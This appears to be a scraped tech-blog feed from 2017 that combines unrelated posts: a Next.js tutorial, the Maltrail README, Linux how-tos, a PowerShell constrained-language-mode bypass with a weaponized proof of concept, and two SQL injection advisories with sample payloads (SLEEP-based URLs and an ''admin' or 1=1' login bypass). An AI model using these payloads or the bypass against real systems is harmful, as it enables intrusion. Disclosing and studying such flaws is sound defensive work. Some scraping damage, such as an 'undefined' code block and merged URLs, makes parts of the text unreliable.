Aug 31, 2017

Building a Blog With Next.js and Styled-Components

Next.js is an awesome new framework for building universal React applications. In simple terms, that means you can use React to render templates on the server, as well front-end components the way you’re most likely used to. The advantages of this are numerous (shared components, faster rendering, great tooling), but getting it all to work properly is generally a pain.

Next.js makes this process easy, and with the release of V3 I thought I’d whip up a blog to learn and demonstrate how it works. In this tutorial we’ll be using the following:
  • next (3.X)
  • styled-components (phenomenal css-in-js solution)
  • next-routes (middleware for expressive routes in next)
  • express (for serving our pages, although you can also do static exports)
I’d highly recommend you follow along with the github repo here https://github.com/timberio/next-go/, as some components are left out for the sake of brevity.
Building a Blog With Next.js and styled-components

1. Getting Started

Getting set up is simple, you can follow along in the docs but the gist of it is to install next, react, and react-dom, add a simple build script and create your index file.
yarn add next@beta react react-dom --save
Add the following scripts to your package.json
{
  "scripts": {
    "dev": "next",
    "build": "next build",
    "start": "next start"
  }
}
Then create an index.js file inside of a pages folder in the root
// ./pages/index.js

export default () => (
  <div>Welcome to next.js!</div>
)
Then you can just run yarn dev and you should be up and running on localhost:3000. Hot reloading is baked in by default, which you can peek at if you inspect the .next folder in your root directory.

2. Adding Some Style

Next up we’ll configure styled-components to style our blog.
First run
yarn add styled-components.
Then create a custom _document.js file in the root with the following:
https://gist.github.com/a8711187724db5ac96b4c4e391f245a5
The custom _document.js allows us to override the default page layout and inject our own styles and markup surrouding our react app.

3. Creating a Layout

Now let’s create a main layout which all of our blog views will use, put the following in layouts/Main.js:
/* layouts/Main.js */

import Head from 'next/head'
import Wrapper from './Wrapper'
import Nav from 'components/Nav'
import Footer from 'components/Footer'

export default ({ children, title = 'This is the default title' }) => (
  <Wrapper>
    <Head>
      <title>{ title }</title>
    </Head>
    <header>
      <Nav />
    </header>

    <main>
      { children }
    </main>

    <Footer>
      Footer
    </Footer>
  </Wrapper>
)
We’ll use this layout to wrap our pages, which can override the <Head> tags and render content into the { children } block.

4. Rendering Posts

Now that we have our layout set up, let’s modify our index.js page to take advantage of it, and also render some posts.
Update pages/index.js with the following:
import React from 'react'
import Layout from 'layouts/Main';
import { getPosts } from 'api/posts'
import { Link } from 'routes'

import Post from 'components/Post'

const IndexPage = ({ posts }) => (
  <Layout>
    <ul>
      {posts.map(p => (
        <Post key={p.title} post={p} />
      ))}
    </ul>
  </Layout>
)

IndexPage.getInitialProps = async ({ req }) => {
  const res = await getPosts()
  const json = await res.json()
  return { posts: json }
}

export default IndexPage
The key here is the getInitialProps on our IndexPage component, which fetches all of the required data needed for this page to render. When this page is accessed directly at localhost:3000, Next will take care of fetching the data before the page is rendered. If we're navigating to this page from another one, no additional page reloads will happen, Next's clientside routing will take over and fetch the data for us before rendering the component thanks to the Link component. You can even add the prefetch property to tell Next to prefetch that page for blazing fast page loads.
Now we’ll use some sample json and place the api in api/posts/index.js:
undefined
And add our Post component in components/Post/index.js:
import React from 'react'
import { Link } from 'routes'
import Wrapper from './Wrapper'

const PostItem = ({ post }) => (
  <Wrapper>
    <Link route='post' params={{ slug: post.title }}>
      <a>
        <h3>{post.title}</h3>
        <p>{post.body}</p>
      </a>
    </Link>
  </Wrapper>
)

export default PostItem
When you reload the page you should see a list of posts getting rendered by our index page like so (you can see the styles in the github repo https://github.com/timberio/next-go/).

5. Post Pages

Now that we have a list of posts, lets add a route to view each individual post. Create a new page in pages/Post.js like so:
import React from 'react'
import Link from 'next/link'
import styled from 'styled-components'
import Layout from 'layouts/Main';
import { getPost } from 'api/posts'

const PostPage = ({ post }) => (
  <Layout>
   <h1>{post.title}</h1>
   <p>{post.body}</p>
  </Layout>
)

PostPage.getInitialProps = async ({ query }) => {
  const res = await getPost(query.slug)
  const json = await res.json()
  return { post: json[0] }
}

export default PostPage
This page is reponsible for fetching and rendering individual posts, so let’s add a route to show it. We’ll be using next-routes for some nice expressive route definitions, so simply run:
yarn add next-routes
and add a routes.js folder in the root with the following:
const nextRoutes = require('next-routes')
const routes = module.exports = nextRoutes()

routes.add('index', '/')
routes.add('post', '/blog/:slug')
Then make sure to add this middleware in ./server.js
const express = require('express')
const next = require('next')
const routes = require('./routes')

const dev = process.env.NODE_ENV !== 'production'
const app = next({ dev })
const handle = app.getRequestHandler()
const handler = routes.getRequestHandler(app)

app.prepare()
.then(() => {
  const server = express()
  server.use(handler)

  server.get('*', (req, res) => {
    return handle(req, res)
  })

  server.listen(3000, (err) => {
    if (err) throw err
    console.log('> Ready on http://localhost:3000')
  })
})
Now our <Link route='post' params={{ slug: post.title }}> components in pages/index.js will map to this page with the proper params and if you click on one you should see something like this:
That’s it! You can easily sub in your own endpoints in api/posts/index.js to fetch from your API or CMS of choice.
You can see a working demo at https://next-go.now.sh/ and view the code at https://github.com/timberio/next-go. You can also learn more about Next at https://learnnextjs.com/.
published at https://timber.io/blog/building-a-blog-with-next-jshttps://medium.com/styled-components/building-a-blog-with-next-js-359cf1236574

Malicious Traffic Detection System 101Scratch

Introduction

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).
Malicious Traffic Detection System
Malicious Traffic Detection System.
The following (black)lists (i.e. feeds) are being utilized:
alienvault, autoshun, badips, bambenekconsultingc2dns,
bambenekconsultingc2ip, bambenekconsultingdga, bitcoinnodes,
blocklist, botscout, bruteforceblocker, ciarmy, cruzit,
cybercrimetracker, deepviz, dataplanesipinvitation,
dataplanesipquery, dataplane, dshielddns, dshieldip,
emergingthreatsbot, emergingthreatscip, emergingthreatsdns,
feodotrackerdns, malwaredomainlist, malwaredomains, malwarepatrol,
maxmind, myip, nothink, openbl, openphish, packetmailcarisirt,
packetmailramnode, palevotracker, policeman, proxylists, proxyrss,
proxy, ransomwaretrackerdns, ransomwaretrackerip,
ransomwaretrackerurl, riproxies, rutgers, sblam, securityresearch,
snort, socksproxy, sslipbl, sslproxies, torproject, torstatus,
turris, urlvir, voipbl, vxvault, zeustrackerdns, zeustrackerip,
zeustrackermonitor, zeustrackerurl, etc.
As of static entries, the trails for the following malicious entities (e.g. malware C&Cs or sinkholes) have been manually included (from various AV reports and personal research):
aboc, adwind, alienspy, almalocker, alureon, android_acecard,
android_adrd, android_alienspy, android_arspam,
android_backflash, android_basebridge, android_boxer,
android_chuli, android_claco, android_coolreaper,
android_counterclank, android_cyberwurx, android_dendoroid,
android_dougalek, android_droidjack, android_droidkungfu,
android_enesoluty, android_ewalls, android_exprespam,
android_fakebanco, android_fakedown, android_fakeinst,
android_fakelog, android_fakemart, android_fakemrat,
android_fakeneflic, android_fakesecsuit, android_feabme,
android_flexispy, android_frogonal, android_geinimi,
android_ghostpush, android_ginmaster, android_gmaster,
android_godwon, android_golddream, android_gonesixty,
android_ibanking, android_kemoge, android_lockdroid,
android_lovetrap, android_maistealer, android_maxit,
android_oneclickfraud, android_opfake, android_ozotshielder,
android_pikspam, android_pjapps, android_qdplugin,
android_repane, android_roidsec, android_samsapo,
android_sandorat, android_selfmite, android_simplocker,
android_skullkey, android_sndapps, android_spytekcell,
android_stealer, android_stels, android_teelog, android_tetus,
android_tonclank, android_torec, android_uracto,
android_usbcleaver, android_walkinwat, android_windseeker,
android_zertsecurity, androm, andromem, angler, anuna, arec,
aridviper, artro, autoit, avalanche, avrecon, axpergle, babar,
bachosens, badblock, balamid, bamital, bankapol, bankpatch,
banloa, banprox, bayrob, bedep, blackenergy, blackvine,
blockbuster, bredolab, bubnix, bucriv, buterat, camerashy,
carbanak, carberp, careto, casper, cerber, changeup, chanitor,
chekua, cheshire, chewbacca, chisbur, cleaver, cloud_atlas,
conficker, contopee, copykittens, corebot, cosmicduke,
couponarific, criakl, cridex, crilock, cryakl, cryptinfinite,
cryptodefense, cryptolocker, cryptowall, ctblocker, cutwail,
darkhotel, defru, desertfalcon, destory, dnschanger,
dnsmessenger, dnstrojan, dorifel, dorkbot, drapion, dridex,
dukes, dursg, dyreza, elf_aidra, elf_billgates, elf_darlloz,
elf_ekoms, elf_fysbis, elf_groundhog, elf_hacked_mint,
elf_mayhem, elf_mokes, elf_pinscan, elf_rekoobe, elf_shelldos,
elf_sshscan, elf_themoon, elf_turla, elf_xnote, elf_xorddos,
elpman, emogen, emotet, equation, evilbunny, ewind, expiro,
fakeav, fakeran, fantom, fareit, fbi_ransomware, fiexp,
fignotok, fin4, finfisher, fraudload, fynloski, fysna, gamarue,
gauss, gbot, generic, golroted, gozi, groundbait, harnig,
hawkeye, helompy, hiloti, hinired, htran, immortal, injecto,
ios_keyraider, ios_muda, ios_oneclickfraud, ios_specter,
ismdoor, jenxcus, kegotip, keydnap, kingslayer, kolab,
koobface, korgo, korplug, kovter, kradellsh, kulekmoko,
lazarus, locky, lollipop, lotus_blossom, luckycat, majikpos,
malwaremustdie, marsjoke, mdrop, mebroot, mestep, mhretriev,
miniduke, misogow, modpos, morto, nanocor, nbot, necurs,
nemeot, neshuta, nettraveler, netwire, neurevt, nexlogger,
nivdort, nonbolqu, nuqel, nwt, nymaim, odcodc, oficla, onkods,
optima, osx_keranger, osx_keydnap, osx_salgorea,
osx_wirelurker, palevo, pdfjsc, pegasus, pepperat, phytob,
picgoo, pift, plagent, plugx, ponmocup, poshcoder, potao,
powelike, proslikefan, pushdo, pykspa, qakbot, quasar, ramnit,
ransirac, reactorbot, redoctober, redsip, remcos, renocide,
reveton, revetrat, rovnix, runforestrun, russian_doll, rustock,
sakurel, sality, satana, sathurbot, scarcruft, scarletmimic,
scieron, seaduke, sednit, sefnit, selfdel, shifu, shylock,
siesta, silentbrute, silly, simda, sinkhole_abuse,
sinkhole_anubis, sinkhole_arbor, sinkhole_bitdefender,
sinkhole_blacklab, sinkhole_botnethunter, sinkhole_certgovau,
sinkhole_certpl, sinkhole_checkpoint, sinkhole_cirtdk,
sinkhole_conficker, sinkhole_cryptolocker, sinkhole_drweb,
sinkhole_dynadot, sinkhole_dyre, sinkhole_farsight,
sinkhole_fbizeus, sinkhole_fitsec, sinkhole_fnord,
sinkhole_gameoverzeus, sinkhole_georgiatech, sinkhole_gladtech,
sinkhole_honeybot, sinkhole_kaspersky, sinkhole_microsoft,
sinkhole_rsa, sinkhole_secureworks, sinkhole_shadowserver,
sinkhole_sidnlabs, sinkhole_sinkdns, sinkhole_sofacy,
sinkhole_sugarbucket, sinkhole_tech, sinkhole_unknown,
sinkhole_virustracker, sinkhole_wapacklabs, sinkhole_zinkhole,
skeeyah, skynet, skyper, smsfakesky, snake, snifula, snort,
sockrat, sofacy, sohanad, spyeye, stabuniq, stonedrill,
stuxnet, synolocker, tdss, teamspy, teerac, teslacrypt,
themida, tibet, tinba, torpig, torrentlocker, troldesh, turla,
unruy, upatre, utoti, vawtrak, vbcheman, vinderuf, virtum,
virut, vittalia, vobfus, volatilecedar, vundo, waledac,
waterbug, wecorl, wndred, xadupi, xcodeghost, xtrat, yenibot,
yimfoca, zaletelly, zcrypt, zemot, zeroaccess, zeus, zherotee,
zlader, zlob, zombrari, zxshell, etc.

Architecture

Maltrail is based on the Traffic -> Sensor <-> Server <-> Client architecture. Sensor(s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine (e.g. Honeypot) where it "monitors" the passing Traffic for blacklisted items/trails (i.e. domain names, URLs and/or IPs). In case of a positive match, it sends the event details to the (central) Server where they are being stored inside the appropriate logging directory (i.e. LOG_DIR described in the Configuration section). If Sensor is being run on the same machine as Server (default configuration), logs are stored directly into the local logging directory. Otherwise, they are being sent via UDP messages to the remote server (i.e. LOG_SERVER described in the Configuration section).
Server's primary role is to store the event details and provide back-end support for the reporting web application. In default configuration, server and sensor will run on the same machine. So, to prevent potential disruptions in sensor activities, the front-end reporting part is based on the "Fat client" architecture (i.e. all data post-processing is being done inside the client's web browser instance). Events (i.e. log entries) for the chosen (24h) period are transferred to the Client, where the reporting web application is solely responsible for the presentation part. Data is sent toward the client in compressed chunks, where they are processed sequentially. The final report is created in a highly condensed form, practically allowing presentation of virtually unlimited number of events.
Note: Server component can be skipped altogether, and just use the standalone Sensor. In such case, all events would be stored in the local logging directory, while the log entries could be examined either manually or by some CSV reading application.

Quick start

The following set of commands should get your Maltrail Sensor up and running (out of the box with default settings and monitoring interface "any"):
sudo apt-get install git python-pcapy
git clone https://github.com/stamparm/maltrail.git
cd maltrail
sudo python sensor.py
To start the (optional) Server on same machine, open a new terminal and execute the following:
[[ -d maltrail ]] || git clone https://github.com/stamparm/maltrail.git
cd maltrail
python server.py
To test that everything is up and running execute the following:
ping -c 1 136.161.101.53
cat /var/log/maltrail/$(date +"%Y-%m-%d").log
To stop Sensor and Server instances (if running in background) execute the following:
sudo pkill -f sensor.py
pkill -f server.py
Access the reporting interface (i.e. Client) by visiting the http://127.0.0.1:8338 (default credentials: admin:changeme!) from your web browser:
Malicious Traffic Detection System
Malicious Traffic Detection System 101Scratch

Aug 30, 2017

Disable IPv6 Permantly

this tutorial is how to disable ipv6 on linux, for the first go to /etc/sysctl.conf and add the following script:

sudo nano /etc/sysctl.conf and add following lines

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
Disable IPv6 Permantly On Linux
Disable IPv6 Permantly.
Now run following command:
sudo sysctl -p
then your ipv6 automatically disabled by sysctl, to open it again simply delete the script above and do update sysctl back :)

How to Record Terminal Sessions

Install Asciinema

Record Terminal
How to Record Terminal Sessions.


Linux Distro

Fedora


sudo yum install asciinema

Ubuntu


sudo apt-add-repository ppa:zanchey/asciinema

sudo apt-get update

sudo apt-get install asciinema

Arch Linux


pacman -S asciinema

Gentoo Linux


emerge -av asciinema

openSUSE

zypper in asciinema

via Pip

asciinema is available on PyPI and can be installed with pip (Python 3 required):
sudo pip3 install asciinema
This is the universal installation method for all operating systems, which always provides the latest version.

Record terminal session

This is the single most important command in asciinema, since it is how you utilize this tool’s main job.

By running asciinema rec [filename] you start a new recording session. The command (process) that is recorded can be specified with -c option (see below), and defaults to $SHELL which is what you want in most cases.

Recording finishes when you exit the shell (hit Ctrl+D or type exit). If the recorded process is not a shell then recording finishes when the process exits.

If the filename argument is given then the resulting recording (called asciicast) is saved to a local file. It can later be replayed with asciinema play <filename> and/or uploaded to asciinema.org with asciinema upload <filename>. If the filename argument is omitted then (after asking for confirmation) the resulting asciicast is uploaded to asciinema.org for further playback in a web browser.

ASCIINEMA_REC=1 is added to recorded process environment variables. This can be used by your shell’s config file (.bashrc, .zshrc) to alter the prompt or play a sound when shell is being recorded.

Replay recorded asciicast in a terminal

This command replays given asciicast (as recorded by rec command) directly in your terminal.

Playing from a local file:
asciinema play /path/to/asciicast.json

Playing from HTTP(S) URL:
asciinema play https://asciinema.org/a/22124.json
asciinema play http://example.com/demo.json

Playing from asciicast page URL (requires <link rel="alternate" type="application/asciicast+json" href="....json"> in page’s HTML):
asciinema play https://asciinema.org/a/22124
asciinema play http://example.com/blog/post.html

Playing from stdin:
cat /path/to/asciicast.json | asciinema play -
ssh user@host cat asciicast.json | asciinema play -

Playing from IPFS:
asciinema play ipfs:/ipfs/QmcdXYJp6e4zNuimuGeWPwNMHQdxuqWmKx7NhZofQ1nw2V
asciinema play fs:/ipfs/QmcdXYJp6e4zNuimuGeWPwNMHQdxuqWmKx7NhZofQ1nw2V

Available options:
-w, --max-wait=<sec> - Reduce replayed terminal inactivity to max seconds

NOTE: it is recommended to run asciinema play in a terminal of dimensions not smaller than the one used for recording as there’s no “transcoding” of control sequences for new terminal size.

Upload recorded asciicast to asciinema.org site

This command uploads given asciicast (as recorded by rec command) to asciinema.org for further playback in a web browser.

asciinema rec demo.json + asciinema play demo.json + asciinema upload demo.json is a nice combo for when you want to review an asciicast before publishing it on asciinema.org.

Manage recordings on asciinema.org account

If you want to manage your recordings on asciinema.org (set title/description, delete etc) you need to authenticate. This command displays the URL you should open in your web browser to do that.

On every machine you run asciinema recorder, you get a new, unique API token. If you’re already logged in on asciinema.org website and you run asciinema auth from a new computer then this new device will be linked to your account.

You can synchronize your config file (which keeps the API token) across the machines so all of them use the same token, but that’s not necessary. You can assign new tokens to your account from as many machines as you want.
Nara: Here

Aug 29, 2017

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained
Exploiting PowerShell Code.

Introduction

Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. It’s most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attackers ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:
ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
Select-String -Pattern 'Add-Type' |
Sort Path -Unique |
% { Get-AuthenticodeSignature -FilePath $_.Path } |
? { $_.SignerCertificate.Subject -match 'Microsoft' }

Exploitation

Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:
$Global:Source = @'
public class Test {
public static string PrintString(string inputString) {
return inputString;
}
}
'@

Add-Type -TypeDefinition $Global:Source
Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:
  1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
  2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
  3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization

Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:
Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
public class Injected {
public static string ToString(string inputString) {
return inputString;
}
}
'@

Import-Module VulnModule

[Injected]::ToString('Injected!!!')
A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest.

Prevention

The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single quoted string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

Mitigation

While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Nara: Exploit-Monday

Splitting and Re-Assembling Files in Linux

Linux has several utilities for splitting up files.
So why would you want to split your files? One use case is to split a large file into smaller sizes so that it fits on smaller media, like USB sticks. This is also a good trick to transfer files via USB sticks when you're stuck with FAT32, which has a maximum file size of 4GB, and your files are bigger than that. Another use case is to speed up network file transfers, because parallel transfers of small files are usually faster.

We'll learn how to use csplit, split, and cat to chop up and then put files back together. These work on any file type: text, image, audio, .iso, you name it.

Split Files With csplit

csplit is one of those funny little commands that has been around forever, and when you discover it you wonder how you ever made it through life without it. csplit divides single files into multiple files. This example demonstrates its simplest invocation, which divides the file foo.txt into three files, split at line numbers 1 and 3:
$ csplit foo.txt 1
0
15
csplit creates three new files in the current directory, and prints the sizes of your new files in bytes. By default, each new file is named xxnn:
Splitting and Re-Assembling Files in Linux
Splitting and Re-Assembling.
You can view the first ten lines of each of your new files all at once with the head command:
$ head xx0*
==> xx00 <==

==> xx01 <==
2591
3889
2359
What if you want to split a file into several files all containing the same number of lines? Specify the number of lines, and then enclose the number of repetitions in curly braces. This example repeats the split 4 times, and dumps the leftover in the last file:
$ csplit foo.txt 1 {3}
0
5
5
5
You may use the asterisk wildcard to tell csplit to repeat your split as many times as possible. Which sounds cool, but it fails if the file does not divide evenly:
$ csplit foo.txt 1 {*}
0
5
5
5
The default behavior is to delete the output files on errors. You can foil this with the -k option, which will not remove the output files when there are errors. Another gotcha is every time you run csplit it overwrites the previous files it created, so give your splits new filenames to save them. Use --prefix=prefix to set a different file prefix:
Splitting and Re-Assembling Files in Linux
Splitting and Re-Assembling.

Splitting Files into Sizes

split is similar to csplit. It splits files into specific sizes, which is fabulous when you're splitting large files to copy to small media, or for network transfers. The default size is 1000 lines:
$ split foo.txt
$ ls
foo.txt  mine00  mine01  xaa
They come out to a similar size, but you can specify any size you want. This example is 20 megabytes:
$ split -b 20M foo.txt
The size abbreviations are K, M, G, T, P, E, Z, Y (powers of 1024), or KB, MB, GB, and so on for powers of 1000.
Choose your own prefix and suffix for the filenames:
$ split -a 3 --numeric-suffixes=9 --additional-suffix=mine foo.txt SB
240K Aug 21 17:44 SB009mine
214K Aug 21 17:44 SB010mine
220K Aug 21 17:44 SB011mine
The -a controls how many numeric digits there are. --numeric-suffixes sets the starting point for numbering. The default prefix is x, and you can set a different prefix by typing it after the filename.
Nara: Here

Aug 28, 2017

Exploit: WordPress Plugin Easy Modal 2.0.17 - SQL Injection

WordPress Easy Modal Plugin - Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-007
Advisory Title: WordPress Easy Modal Plugin Multiple
WordPress Plugin Easy Modal 2017
Easy Modal.

Vulnerabilities

  • Software: WordPress Easy Modal plugin
  • Language: PHP
  • Version: 2.0.17 and below
  • Vendor Status: Vendor contacted, update released
  • Release Date: 2017/08/07
  • Risk: Medium 

1. General Overview

During the security audit of Easy Modal plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

2. Software Overview

According to the plugin developers, Easy Modal is the #1 WordPress Popup Plugin. It's advertised as "Make glorious & powerful popups and market your content like never before - all in minutes!".
According to wordpress.org, it has more than 20,000 active installs.
Homepage:
http://wordpress.org/extend/plugins/easy-modal/
https://easy-modal.com

3. Vulnerability Description

During the security analysis, ThunderScan discovered SQL injection vulnerabilities in Easy Modal WordPress plugin.

The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be
able to.

The nonce token is required as the URL parameter. Token value is not unique for each request, nor per each URL, so if the attacker manages to obtain a valid token value, the module could be exposed to attack vectors such as Cross Site request forgery (CSRF).

3.1. SQL injection

  • Function: $wpdb->query()
  • Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
  • Sample URL:
  • http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=dele
  • te&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
  • File: easy-modal\classes\controller\admin\modals.php

3.2. SQL injection

  • Function: $wpdb->query()
  • Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
  • Sample URL:
  • http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_ht
  • tp_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-mo
  • dal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AN
  • D%20SLEEP(10)--%20ZpVQ&action2=-1
  • File: easy-modal\classes\controller\admin\modals.php

4. Credits

by Neven Biruski. | DB

Fundamentals of ASP.Net programming vs. PHP programming

It's actually a vast unwanted debate between PHP and ASP.NET, the battle continues between the supporters of these two programming languages, with no clear conclusion coming out. Both of these programming languages can be used to develop the same type of projects, the difference is just cost, platform independency, security etc.
Hyper-text-pre-processor (PHP) and Active-server-pages (ASP)
Hyper-text-pre-processor (PHP) and Active-server-pages (ASP).
Hyper-text-pre-processor (PHP) and Active-server-pages (ASP) are the two standard programming languages for website application development and more significantly when it comes to produce database-driven websites to interrelating hugely with databases. PHP is an open-source programming language which is derived from lots of different languages. On the other hand ASP is such kind of programming languages which preferring Microsoft product mostly.

Both programming languages PHP and ASP are used to develop dynamic database oriented websites. Active Server Pages (ASP) is normally from Microsoft and is used only with Internet Information Server (IIS) that runs on Microsoft Servers also. But on the other hand you can say PHP is platform independent programming languages and can connect with several kinds of databases.

There are a lot of differences between ASP and PHP.

Expenditure

To run ASP.net programs first need to install IIS on a Windows server platform, this is not a free package. PHP programs can run on Linux, which is free package. Even the database connectivity is expensive for ASP, because it require MS-SQL product of Microsoft that needs to be acquired. Same time on the other hand PHP generally uses MySQL for database connectivity, which is freely accessible.

The Simplicity in Coding

PHP codes itself are very light in weight, a contract programmer who begins his career into PHP, does not felt any pressure to look the source code to understand. Whereas In ASP codes are not so easy to quick understand.

Database Compatibility

PHP generally being extremely flexible as it uses MySQL for database connectivity, which is freely accessible. Same time on the other hand Database compatibility is expensive for ASP, because it require MS-SQL product of Microsoft that needs to be acquired.

General Run Time

If we evaluate the running speed of PHP and ASP then PHP should gets the upper hand. Normally it is viewed that PHP code runs quicker than ASP code. Due to COM based architecture, ASP uses server space to run while PHP code runs on its own inbuilt memory space.

Background Language Support

ASP has a similar like Visual Basic type of syntax that also linked to Microsoft products as well. On the other hand PHP codes are based on generally C++ language and the syntax, which is used in PHP, is quite similar to C/C++ syntax. C/C++ is still considered by maximum software programmer is the finest programming language and people who love C++ language would certainly feel more relaxed with the PHP syntax.

Running Platform Connectivity

PHP codes can run on different platforms like UNIX, Solaris, Linux, and Windows whereas ASP codes are mostly linked with Windows platforms. Though, ASP programs can run on a Linux platform with the help of ASP-Apache installed on the server.

Further Tools Cost

Several tools used in PHP are mostly free of cost in the market and as PHP is open source a lot of codes can be available in open source forums and blogs. PHP has inbuilt attributes like ftp, encryption methods, even email also from a web page but in ASP such attributes are not obtainable and for this reason only some more features are required which are not free that increase the total cost as well.

Larger Applications Support

PHP is just as protected as ASP from coding level. The main difference is only for private data like “social security numbers”; “PIN numbers” etc. ASP is more practicable option. Organizations like government firms normally don’t have much stipulated commercial budgets and looking for required security, they really helpful ASP.net.

At the end, we can make a conclusion that both programming languages have their advantages and disadvantages specific to user requirement. It can be said that both the programming languages have their own significance depending upon the user's requirements and budgets. It is viewed that in any discussion board, ASP.net is similarly capable but many of them suggesting PHP for small business owners those who have a fixed budget and does not required superb security support. PHP cannot provide e-commerce application developmentFeature Articles, only for them ASP.net will be the best choice.

Exploit: Schools Alert Management - SQL injection login bypass

SQL injection login bypass
Schools Alert Management.
Schools Alert Management - SQL injection login bypass, an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school.

Proof of Concept: http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 - you must choose the check box as management

Exploit Author: Ali BawazeEer
Dork: N/A
Date: 28.08.2017
Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
Version: 2.01
Category: Webapps
Tested on: Win / Mozila Firefox

Aug 27, 2017

PaperAdmin Template With Angular JS

A flat admin dashboard using Angular JS 2/4

PaperAdmin

PaperAdmin is a bootstrap single page dashboard developed using Angular JS 4. PaperAdmin features built-in components to make dashboard development easy. It features custom components such as calendars, list views with CRUD(Create, Read, Update, Delete) functionality, pie charts with status and custom cards to display relevant information.

Development server

Run ng serve for a dev server. Navigate to http://localhost:4200/. The app will automatically reload if you change any of the source files.

Build

Run ng build to build the project. The build artifacts will be stored in the dist/ directory. Use the -prod flag for a production build.
PaperAdmin Template For Admin Developers With Angular JS
Template.
PaperAdmin Template For Admin Developers With Angular JS
Template.

SecGen: Security Scenario Generator is Open Source

Create randomly insecure VMs

Summary

